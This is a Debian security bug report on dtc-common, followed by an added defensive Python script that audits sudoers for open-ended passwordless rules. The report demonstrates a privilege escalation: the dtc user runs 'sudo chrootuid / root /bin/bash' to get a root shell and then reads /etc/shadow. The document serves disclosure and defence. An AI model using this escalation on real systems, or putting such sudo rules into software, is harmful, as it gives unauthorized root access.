Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole

The install script gives the dtc user (the user that is running apache) unrestricted sudo access to chrootuid, which essentially gives root access to the dtc account:

root@testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root@testdtc:/# whoami
root
root@testdtc:/# wc -l /etc/shadow
27 /etc/shadow
root@testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
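
A check a defender could run over sudoers content for the pattern in this report, as an added example that is not part of the original bug report or of dtc: it flags passwordless rules that give a command-running program such as chrootuid open-ended arguments. The function name audit_sudoers, the COMMAND_RUNNERS entries other than chrootuid, and the third sample rule are assumptions of this example.

```python
import os
import re

# Programs whose purpose is to run another command. chrootuid is the one from
# the report; the rest of the list is an assumption of this example.
COMMAND_RUNNERS = {"chrootuid", "chroot", "env", "su"}

# Constructed sample: lines 1-2 are the grep output quoted in the report,
# line 3 is a hypothetical rule with every argument pinned.
SAMPLE_SUDOERS = """\
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *
backup ALL= NOPASSWD: /usr/bin/chrootuid /srv/jail nobody /usr/bin/true
"""

RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?P<spec>.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):\s*")


def audit_sudoers(text):
    """Return (user, command) pairs for passwordless rules that hand a
    command-running program open-ended arguments."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        spec = re.sub(r"^\([^)]*\)\s*", "", m["spec"])  # drop a leading Runas list
        nopasswd = False  # tags carry over to later commands in the same list
        for cmd in spec.split(","):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):
                if t[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = t[1] == "NOPASSWD"
                cmd = cmd[t.end():]
            parts = cmd.split()
            if not parts:
                continue
            binary, args = os.path.basename(parts[0]), parts[1:]
            # In sudoers an absent argument list permits any arguments;
            # a wildcard in the list is just as open.
            open_args = not args or any(c in a for a in args for c in "*?")
            if nopasswd and binary in COMMAND_RUNNERS and open_args:
                findings.append((m["who"], cmd))
    return findings
```

On the sample, only the rule quoted in the report is flagged; the rule with fixed arguments and the Defaults line are not.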